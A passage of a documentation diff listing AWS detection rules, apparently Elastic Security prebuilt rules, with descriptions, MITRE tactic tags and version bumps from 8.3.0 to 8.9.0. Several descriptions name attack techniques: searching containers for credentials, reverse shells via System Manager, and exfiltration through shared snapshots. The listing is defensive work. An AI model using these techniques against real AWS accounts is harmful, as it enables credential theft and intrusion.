[Use Case: Log Auditing], [Resources: Investigation Guide], [Tactic: Impact] |8.3.0 |107 +|<<aws-cloudwatch-log-group-deletion, AWS CloudWatch Log Group Deletion>> |Identifies the deletion of a specified AWS CloudWatch log group. When a log group is deleted, all the archived log events associated with the log group are also permanently deleted. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Log Auditing], [Resources: Investigation Guide], [Tactic: Impact] |8.9.0 |208 -|<<aws-cloudwatch-log-stream-deletion, AWS CloudWatch Log Stream Deletion>> |Identifies the deletion of an AWS CloudWatch log stream, which permanently deletes all associated archived log events with the stream. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Log Auditing], [Tactic: Impact], [Resources: Investigation Guide] |8.3.0 |107 +|<<aws-cloudwatch-log-stream-deletion, AWS CloudWatch Log Stream Deletion>> |Identifies the deletion of an AWS CloudWatch log stream, which permanently deletes all associated archived log events with the stream. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Log Auditing], [Tactic: Impact], [Resources: Investigation Guide] |8.9.0 |208 -|<<aws-config-resource-deletion, AWS Config Resource Deletion>> |Identifies attempts to delete an AWS Config Service resource. An adversary may tamper with Config services in order to reduce visibility into the security posture of an account and / or its workload instances. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Resources: Investigation Guide], [Tactic: Defense Evasion] |8.3.0 |107 +|<<aws-config-resource-deletion, AWS Config Resource Deletion>> |Identifies attempts to delete an AWS Config Service resource. An adversary may tamper with Config services in order to reduce visibility into the security posture of an account and / or its workload instances. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Resources: Investigation Guide], [Tactic: Defense Evasion] |8.9.0 |208 -|<<aws-configuration-recorder-stopped, AWS Configuration Recorder Stopped>> |Identifies an AWS configuration change to stop recording a designated set of resources. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Defense Evasion] |8.3.0 |104 +|<<aws-configuration-recorder-stopped, AWS Configuration Recorder Stopped>> |Identifies an AWS configuration change to stop recording a designated set of resources. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Defense Evasion] |8.9.0 |205 |<<aws-credentials-searched-for-inside-a-container, AWS Credentials Searched For Inside A Container>> |This rule detects the use of system search utilities like grep and find to search for AWS credentials inside a container. Unauthorized access to these sensitive files could lead to further compromise of the container environment or facilitate a container breakout to the underlying cloud environment. |[Data Source: Elastic Defend for Containers], [Domain: Container], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access] |8.8.0 |1 -|<<aws-deletion-of-rds-instance-or-cluster, AWS Deletion of RDS Instance or Cluster>> |Identifies the deletion of an Amazon Relational Database Service (RDS) Aurora database cluster, global database cluster, or database instance. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Impact] |8.3.0 |104 +|<<aws-deletion-of-rds-instance-or-cluster, AWS Deletion of RDS Instance or Cluster>> |Identifies the deletion of an Amazon Relational Database Service (RDS) Aurora database cluster, global database cluster, or database instance. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Impact] |8.9.0 |205 -|<<aws-ec2-encryption-disabled, AWS EC2 Encryption Disabled>> |Identifies disabling of Amazon Elastic Block Store (EBS) encryption by default in the current region. Disabling encryption by default does not change the encryption status of your existing volumes. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Impact] |8.3.0 |104 +|<<aws-ec2-encryption-disabled, AWS EC2 Encryption Disabled>> |Identifies disabling of Amazon Elastic Block Store (EBS) encryption by default in the current region. Disabling encryption by default does not change the encryption status of your existing volumes. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Impact] |8.9.0 |205 -|<<aws-ec2-full-network-packet-capture-detected, AWS EC2 Full Network Packet Capture Detected>> |Identifies potential Traffic Mirroring in an Amazon Elastic Compute Cloud (EC2) instance. Traffic Mirroring is an Amazon VPC feature that you can use to copy network traffic from an Elastic network interface. This feature can potentially be abused to exfiltrate sensitive data from unencrypted internal traffic. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Network Security Monitoring], [Tactic: Exfiltration], [Tactic: Collection] |8.3.0 |104 +|<<aws-ec2-full-network-packet-capture-detected, AWS EC2 Full Network Packet Capture Detected>> |Identifies potential Traffic Mirroring in an Amazon Elastic Compute Cloud (EC2) instance. Traffic Mirroring is an Amazon VPC feature that you can use to copy network traffic from an Elastic network interface. This feature can potentially be abused to exfiltrate sensitive data from unencrypted internal traffic. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Network Security Monitoring], [Tactic: Exfiltration], [Tactic: Collection] |8.9.0 |205 -|<<aws-ec2-network-access-control-list-creation, AWS EC2 Network Access Control List Creation>> |Identifies the creation of an AWS Elastic Compute Cloud (EC2) network access control list (ACL) or an entry in a network ACL with a specified rule number. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Network Security Monitoring], [Tactic: Persistence] |8.3.0 |104 +|<<aws-ec2-network-access-control-list-creation, AWS EC2 Network Access Control List Creation>> |Identifies the creation of an AWS Elastic Compute Cloud (EC2) network access control list (ACL) or an entry in a network ACL with a specified rule number. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Network Security Monitoring], [Tactic: Persistence] |8.9.0 |205 -|<<aws-ec2-network-access-control-list-deletion, AWS EC2 Network Access Control List Deletion>> |Identifies the deletion of an Amazon Elastic Compute Cloud (EC2) network access control list (ACL) or one of its ingress/egress entries. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Network Security Monitoring], [Tactic: Defense Evasion] |8.3.0 |104 +|<<aws-ec2-network-access-control-list-deletion, AWS EC2 Network Access Control List Deletion>> |Identifies the deletion of an Amazon Elastic Compute Cloud (EC2) network access control list (ACL) or one of its ingress/egress entries. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Network Security Monitoring], [Tactic: Defense Evasion] |8.9.0 |205 -|<<aws-ec2-snapshot-activity, AWS EC2 Snapshot Activity>> |An attempt was made to modify AWS EC2 snapshot attributes. Snapshots are sometimes shared by threat actors in order to exfiltrate bulk data from an EC2 fleet. If the permissions were modified, verify the snapshot was not shared with an unauthorized or unexpected AWS account. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Exfiltration], [Resources: Investigation Guide] |8.3.0 |107 +|<<aws-ec2-snapshot-activity, AWS EC2 Snapshot Activity>> |An attempt was made to modify AWS EC2 snapshot attributes. Snapshots are sometimes shared by threat actors in order to exfiltrate bulk data from an EC2 fleet. If the permissions were modified, verify the snapshot was not shared with an unauthorized or unexpected AWS account. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Exfiltration], [Resources: Investigation Guide] |8.9.0 |208 -|<<aws-ec2-vm-export-failure, AWS EC2 VM Export Failure>> |Identifies an attempt to export an AWS EC2 instance. A virtual machine (VM) export may indicate an attempt to extract or exfiltrate information. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Exfiltration], [Tactic: Collection] |8.3.0 |104 +|<<aws-ec2-vm-export-failure, AWS EC2 VM Export Failure>> |Identifies an attempt to export an AWS EC2 instance. A virtual machine (VM) export may indicate an attempt to extract or exfiltrate information. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Exfiltration], [Tactic: Collection] |8.9.0 |205 -|<<aws-efs-file-system-or-mount-deleted, AWS EFS File System or Mount Deleted>> |Detects when an EFS File System or Mount is deleted. An adversary could break any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts. The mount must be deleted prior to deleting the File System, or the adversary will be unable to delete the File System. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Impact] |8.3.0 |104 +|<<aws-efs-file-system-or-mount-deleted, AWS EFS File System or Mount Deleted>> |Detects when an EFS File System or Mount is deleted. An adversary could break any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts. The mount must be deleted prior to deleting the File System, or the adversary will be unable to delete the File System. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Impact] |8.9.0 |205 -|<<aws-elasticache-security-group-created, AWS ElastiCache Security Group Created>> |Identifies when an ElastiCache security group has been created. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Defense Evasion] |8.3.0 |104 +|<<aws-elasticache-security-group-created, AWS ElastiCache Security Group Created>> |Identifies when an ElastiCache security group has been created. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Defense Evasion] |8.9.0 |205 -|<<aws-elasticache-security-group-modified-or-deleted, AWS ElastiCache Security Group Modified or Deleted>> |Identifies when an ElastiCache security group has been modified or deleted. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Defense Evasion] |8.3.0 |104 +|<<aws-elasticache-security-group-modified-or-deleted, AWS ElastiCache Security Group Modified or Deleted>> |Identifies when an ElastiCache security group has been modified or deleted. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Defense Evasion] |8.9.0 |205 -|<<aws-eventbridge-rule-disabled-or-deleted, AWS EventBridge Rule Disabled or Deleted>> |Identifies when a user has disabled or deleted an EventBridge rule. This activity can result in an unintended loss of visibility in applications or a break in the flow with other AWS services. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Impact] |8.3.0 |104 +|<<aws-eventbridge-rule-disabled-or-deleted, AWS EventBridge Rule Disabled or Deleted>> |Identifies when a user has disabled or deleted an EventBridge rule. This activity can result in an unintended loss of visibility in applications or a break in the flow with other AWS services. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Impact] |8.9.0 |205 -|<<aws-execution-via-system-manager, AWS Execution via System Manager>> |Identifies the execution of commands and scripts via System Manager. Execution methods such as RunShellScript, RunPowerShellScript, and alike can be abused by an authenticated attacker to install a backdoor or to interact with a compromised instance via reverse-shell using system only commands. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Log Auditing], [Tactic: Initial Access], [Resources: Investigation Guide] |8.3.0 |107 +|<<aws-execution-via-system-manager, AWS Execution via System Manager>> |Identifies the execution of commands and scripts via System Manager. Execution methods such as RunShellScript, RunPowerShellScript, and alike can be abused by an authenticated attacker to install a backdoor or to interact with a compromised instance via reverse-shell using system only commands. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Log Auditing], [Tactic: Initial Access], [Resources: Investigation Guide] |8.9.0 |208 -|<<aws-guardduty-detector-deletion, AWS GuardDuty Detector Deletion>> |Identifies the deletion of an Amazon GuardDuty detector. Upon deletion, GuardDuty stops monitoring the environment and all existing findings are lost. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Defense Evasion] |8.3.0 |104 +|<<aws-guardduty-detector-deletion, AWS GuardDuty Detector Deletion>> |Identifies the deletion of an Amazon GuardDuty detector. Upon deletion, GuardDuty stops monitoring the environment and all existing findings are lost. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Defense Evasion] |8.9.0 |205 -|<<aws-iam-assume-role-policy-update, AWS IAM Assume Role Policy Update>> |Identifies attempts to modify an AWS IAM Assume Role Policy. An adversary may attempt to modify the AssumeRolePolicy of a misconfigured role in order to gain the privileges of that role. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Privilege Escalation] |8.3.0 |107 +|<<aws-iam-assume-role-policy-update, AWS IAM Assume Role Policy Update>> |Identifies attempts to modify an AWS IAM Assume Role Policy. An adversary may attempt to modify the AssumeRolePolicy of a misconfigured role in order to gain the privileges of that role. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Privilege Escalation] |8.9.0 |208 -|<<aws-iam-brute-force-of-assume-role-policy, AWS IAM Brute Force of Assume Role Policy>> |Identifies a high number of failed attempts to assume an AWS Identity and Access Management (IAM) role. IAM roles are used to delegate access to users or services. An adversary may attempt to enumerate IAM roles in order to determine if a role exists before attempting to assume or hijack the discovered role. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Credential Access] |8.3.0 |107 +|<<aws-iam-brute-force-of-assume-role-policy, AWS IAM Brute Force of Assume Role Policy>> |Identifies a high number of failed attempts to assume an AWS Identity and Access Management (IAM) role. IAM roles are used to delegate access to users or services. An adversary may attempt to enumerate IAM roles in order to determine if a role exists before attempting to assume or hijack the discovered role. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Credential Access] |8.9.0 |208 -|<<aws-iam-deactivation-of-mfa-device, AWS IAM Deactivation of MFA Device>> |Identifies the deactivation of a specified multi-factor authentication (MFA) device and removes it from association with the user name for which it was originally enabled. In AWS Identity and Access Management (IAM), a device must be deactivated before it can be deleted. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Resources: Investigation Guide], [Tactic: Impact] |8.3.0 |107 +|<<aws-iam-deactivation-of-mfa-device, AWS IAM Deactivation of MFA Device>> |Identifies the deactivation of a specified multi-factor authentication (MFA) device and removes it from association with the user name for which it was originally enabled. In AWS Identity and Access Management (IAM), a device must be deactivated before it can be deleted. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Resources: Investigation Guide], [Tactic: Impact] |8.9.0 |208 -|<<aws-iam-group-creation, AWS IAM Group Creation>> |Identifies the creation of a group in AWS Identity and Access Management (IAM). Groups specify permissions for multiple users. Any user in a group automatically has the permissions that are assigned to the group. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Tactic: Persistence] |8.3.0 |104 +|<<aws-iam-group-creation, AWS IAM Group Creation>> |Identifies the creation of a group in AWS Identity and Access Management (IAM). Groups specify permissions for multiple users. Any user in a group automatically has the permissions that are assigned to the group. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Tactic: Persistence] |8.9.0 |205 -|<<aws-iam-group-deletion, AWS IAM Group Deletion>> |Identifies the deletion of a specified AWS Identity and Access Management (IAM) resource group. Deleting a resource group does not delete resources that are members of the group; it only deletes the group structure. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Impact] |8.3.0 |104 +|<<aws-iam-group-deletion, AWS IAM Group Deletion>> |Identifies the deletion of a specified AWS Identity and Access Management (IAM) resource group. Deleting a resource group does not delete resources that are members of the group; it only deletes the group structure. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Impact] |8.9.0 |205 -|<<aws-iam-password-recovery-requested, AWS IAM Password Recovery Requested>> |Identifies AWS IAM password recovery requests. An adversary may attempt to gain unauthorized AWS access by abusing password recovery mechanisms. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Tactic: Initial Access] |8.3.0 |104 +|<<aws-iam-password-recovery-requested, AWS IAM Password Recovery Requested>> |Identifies AWS IAM password recovery requests. An adversary may attempt to gain unauthorized AWS access by abusing password recovery mechanisms. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Tactic: Initial Access] |8.9.0 |205 -|<<aws-iam-user-addition-to-group, AWS IAM User Addition to Group>> |Identifies the addition of a user to a specified group in AWS Identity and Access Management (IAM). |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Tactic: Credential Access], [Tactic: Persistence], [Resources: Investigation Guide] |8.3.0 |107 +|<<aws-iam-user-addition-to-group, AWS IAM User Addition to Group>> |Identifies the addition of a user to a specified group in AWS Identity and Access Management (IAM). |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Tactic: Credential Access], [Tactic: Persistence], [Resources: Investigation Guide] |8.9.0 |208 -|<<aws-kms-customer-managed-key-disabled-or-scheduled-for-deletion, AWS KMS Customer Managed Key Disabled or Scheduled for Deletion>> |Identifies attempts to disable or schedule the deletion of an AWS KMS Customer Managed Key (CMK). Deleting an AWS KMS key is destructive and potentially dangerous. It deletes the key material and all metadata associated with the KMS key and is irreversible. After a KMS key is deleted, the data that was encrypted under that KMS key can no longer be decrypted, which means that data becomes unrecoverable. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Log Auditing], [Tactic: Impact] |8.3.0 |4 +|<<aws-kms-customer-managed-key-disabled-or-scheduled-for-deletion, AWS KMS Customer Managed Key Disabled or Scheduled for Deletion>> |Identifies attempts to disable or schedule the deletion of an AWS KMS Customer Managed Key (CMK). Deleting an AWS KMS key is destructive and potentially dangerous. It deletes the key material and all metadata associated with the KMS key and is irreversible. After a KMS key is deleted, the data that was encrypted under that KMS key can no longer be decrypted, which means that data becomes unrecoverable. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Log Auditing], [Tactic: Impact] |8.9.0 |105 -|<<aws-management-console-brute-force-of-root-user-identity, AWS Management Console Brute Force of Root User Identity>> |Identifies a high number of failed authentication attempts to the AWS management console for the Root user identity. An adversary may attempt to brute force the password for the Root user identity, as it has complete access to all services and resources for the AWS account. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Tactic: Credential Access] |8.3.0 |104 +|<<aws-management-console-brute-force-of-root-user-identity, AWS Management Console Brute Force of Root User Identity>> |Identifies a high number of failed authentication attempts to the AWS management console for the Root user identity. An adversary may attempt to brute force the password for the Root user identity, as it has complete access to all services and resources for the AWS account. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Tactic: Credential Access] |8.9.0 |205 -|<<aws-management-console-root-login, AWS Management Console Root Login>> |Identifies a successful login to the AWS Management Console by the Root user. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Initial Access] |8.3.0 |107 +|<<aws-management-console-root-login, AWS Management Console Root Login>> |Identifies a successful login to the AWS Management Console by the Root user. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Initial Access] |8.9.0 |208 -|<<aws-rds-cluster-creation, AWS RDS Cluster Creation>> |Identifies the creation of a new Amazon Relational Database Service (RDS) Aurora DB cluster or global database spread across multiple regions. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Persistence] |8.3.0 |104 +|<<aws-rds-cluster-creation, AWS RDS Cluster Creation>> |Identifies the creation of a new Amazon Relational Database Service (RDS) Aurora DB cluster or global database spread across multiple regions. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Persistence] |8.9.0 |205 -|<<aws-rds-instance-creation, AWS RDS Instance Creation>> |Identifies the creation of an Amazon Relational Database Service (RDS) Aurora database instance. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Persistence] |8.3.0 |104 +|<<aws-rds-instance-creation, AWS RDS Instance Creation>> |Identifies the creation of an Amazon Relational Database Service (RDS) Aurora database instance. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Persistence] |8.9.0 |205 -|<<aws-rds-instance-cluster-stoppage, AWS RDS Instance/Cluster Stoppage>> |Identifies that an Amazon Relational Database Service (RDS) cluster or instance has been stopped. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Impact] |8.3.0 |104 +|<<aws-rds-instance-cluster-stoppage, AWS RDS Instance/Cluster Stoppage>> |Identifies that an Amazon Relational Database Service (RDS) cluster or instance has been stopped. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Impact] |8.9.0 |205 -|<<aws-rds-security-group-creation, AWS RDS Security Group Creation>> |Identifies the creation of an Amazon Relational Database Service (RDS) Security group. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Persistence] |8.3.0 |104 +|<<aws-rds-security-group-creation, AWS RDS Security Group Creation>> |Identifies the creation of an Amazon Relational Database Service (RDS) Security group. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Persistence] |8.9.0 |205 -|<<aws-rds-security-group-deletion, AWS RDS Security Group Deletion>> |Identifies the deletion of an Amazon Relational Database Service (RDS) Security group. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Impact] |8.3.0 |104 +|<<aws-rds-security-group-deletion, AWS RDS Security Group Deletion>> |Identifies the deletion of an Amazon Relational Database Service (RDS) Security group. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Impact] |8.9.0 |205 -|<<aws-rds-snapshot-export, AWS RDS Snapshot Export>> |Identifies the export of an Amazon Relational Database Service (RDS) Aurora database snapshot. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Exfiltration] |8.3.0 |104 +|<<aws-rds-snapshot-export, AWS RDS Snapshot Export>> |Identifies the export of an Amazon Relational Database Service (RDS) Aurora database snapshot. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Exfiltration] |8.9.0 |205 -|<<aws-rds-snapshot-restored, AWS RDS Snapshot Restored>> |Identifies when an attempt was made to restore an RDS Snapshot. Snapshots are sometimes shared by threat actors in order to exfiltrate bulk data or evade detection after performing malicious activities. If the permissions were modified, verify if the snapshot was shared with an unauthorized or unexpected AWS account. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Defense Evasion] |8.3.0 |104 +|<<aws-rds-snapshot-restored, AWS RDS Snapshot Restored>> |Identifies when an attempt was made to restore an RDS Snapshot. Snapshots are sometimes shared by threat actors in order to exfiltrate bulk data or evade detection after performing malicious activities. If the permissions were modified, verify if the snapshot was shared with an unauthorized or unexpected AWS account. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Defense Evasion] |8.9.0 |205 -|<<aws-redshift-cluster-creation, AWS Redshift Cluster Creation>> |Identifies the creation of an Amazon Redshift cluster. Unexpected creation of this cluster by a non-administrative user may indicate a permission or role issue with current users. If unexpected, the resource may not properly be configured and could introduce security vulnerabilities. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Persistence] |8.3.0 |104 +|<<aws-redshift-cluster-creation, AWS Redshift Cluster Creation>> |Identifies the creation of an Amazon Redshift cluster. Unexpected creation of this cluster by a non-administrative user may indicate a permission or role issue with current users. If unexpected, the resource may not properly be configured and could introduce security vulnerabilities. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Persistence] |8.9.0 |205 -|<<aws-root-login-without-mfa, AWS Root Login Without MFA>> |Identifies attempts to login to AWS as the root user without using multi-factor authentication (MFA). Amazon AWS best practices indicate that the root user should be protected by MFA. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Privilege Escalation] |8.3.0 |107 +|<<aws-root-login-without-mfa, AWS Root Login Without MFA>> |Identifies attempts to login to AWS as the root user without using multi-factor authentication (MFA). Amazon AWS best practices indicate that the root user should be protected by MFA. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Privilege Escalation] |8.9.0 |208 -|<<aws-route-53-domain-transfer-lock-disabled, AWS Route 53 Domain Transfer Lock Disabled>> |Identifies when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Persistence] |8.3.0 |104 +|<<aws-route-53-domain-transfer-lock-disabled, AWS Route 53 Domain Transfer Lock Disabled>> |Identifies when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Persistence] |8.9.0 |205 -|<<aws-route-53-domain-transferred-to-another-account, AWS Route 53 Domain Transferred to Another Account>> |Identifies when a request has been made to transfer a Route 53 domain to another AWS account. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Persistence] |8.3.0 |104 +|<<aws-route-53-domain-transferred-to-another-account, AWS Route 53 Domain Transferred to Another Account>> |Identifies when a request has been made to transfer a Route 53 domain to another AWS account. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Persistence] |8.9.0 |205 -|<<aws-route-table-created, AWS Route Table Created>> |Identifies when an AWS Route Table has been created. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Network Security Monitoring], [Tactic: Persistence] |8.3.0 |104 +|<<aws-route-table-created, AWS Route Table Created>> |Identifies when an AWS Route Table has been created. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Network Security Monitoring], [Tactic: Persistence] |8.9.0 |205 -|<<aws-route-table-modified-or-deleted, AWS Route Table Modified or Deleted>> |Identifies when an AWS Route Table has been modified or deleted. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Network Security Monitoring], [Tactic: Persistence] |8.3.0 |104 +|<<aws-route-table-modified-or-deleted, AWS Route Table Modified or Deleted>> |Identifies when an AWS Route Table has been modified or deleted. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Network Security Monitoring], [Tactic: Persistence] |8.9.0 |205 -|<<aws-route53-private-hosted-zone-associated-with-a-vpc, AWS Route53 private hosted zone associated with a VPC>> |Identifies when a Route53 private hosted zone has been associated with VPC. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Persistence] |8.3.0 |104 +|<<aws-route53-private-hosted-zone-associated-with-a-vpc, AWS Route53 private hosted zone associated with a VPC>> |Identifies when a Route53 private hosted zone has been associated with VPC. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Persistence] |8.9.0 |205 -|<<aws-s3-bucket-configuration-deletion, AWS S3 Bucket Configuration Deletion>> |Identifies the deletion of various Amazon Simple Storage Service (S3) bucket configuration components. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Defense Evasion] |8.3.0 |105 +|<<aws-s3-bucket-configuration-deletion, AWS S3 Bucket Configuration Deletion>> |Identifies the deletion of various Amazon Simple Storage Service (S3) bucket configuration components. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Defense Evasion] |8.9.0 |206 -|<<aws-saml-activity, AWS SAML Activity>> |Identifies when SAML activity has occurred in AWS. An adversary could manipulate SAML to maintain access to the target. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Tactic: Defense Evasion] |8.3.0 |104 +|<<aws-saml-activity, AWS SAML Activity>> |Identifies when SAML activity has occurred in AWS. An adversary could manipulate SAML to maintain access to the target. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Tactic: Defense Evasion] |8.9.0 |205 -|<<aws-sts-getsessiontoken-abuse, AWS STS GetSessionToken Abuse>> |Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Tactic: Privilege Escalation] |8.3.0 |104 +|<<aws-sts-getsessiontoken-abuse, AWS STS GetSessionToken Abuse>> |Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Tactic: Privilege Escalation] |8.9.0 |205 -|<<aws-security-group-configuration-change-detection, AWS Security Group Configuration Change Detection>> |Identifies a change to an AWS Security Group Configuration. A security group is like a virtual firewall, and modifying configurations may allow unauthorized access. Threat actors may abuse this to establish persistence, exfiltrate data, or pivot in an AWS environment. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Network Security Monitoring], [Tactic: Persistence] |8.3.0 |104 +|<<aws-security-group-configuration-change-detection, AWS Security Group Configuration Change Detection>> |Identifies a change to an AWS Security Group Configuration. A security group is like a virtual 